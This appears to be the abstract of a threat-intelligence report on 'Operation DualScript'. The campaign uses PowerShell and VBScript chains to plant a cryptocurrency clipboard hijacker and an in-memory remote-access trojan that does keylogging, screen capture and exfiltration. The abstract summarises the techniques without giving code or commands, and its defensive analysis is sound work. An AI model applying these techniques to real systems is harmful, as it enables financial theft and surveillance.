Operation DualScript – A Multi-Stage PowerShell Malware Campaign Targeting Cryptocurrency and Financial Activity

Operation DualScript is a financially motivated, multi-stage malware campaign that abuses Scheduled Tasks, VBScript, and PowerShell to deploy two parallel chains: a web-based PowerShell loader that fetches a Wallet.txt clipboard-hijacker to redirect cryptocurrency payments, and a second PowerShell chain that runs RetroRAT in memory to perform keylogging, screen capture, targeted monitoring of U.S. banking and crypto services, and exfiltration to TCP-based C2 servers. The report includes analysis of persistence, evasion, C2 handshake behavior, targeted keywords, IOCs (file hashes and malicious domains/URLs), and MITRE technique mappings.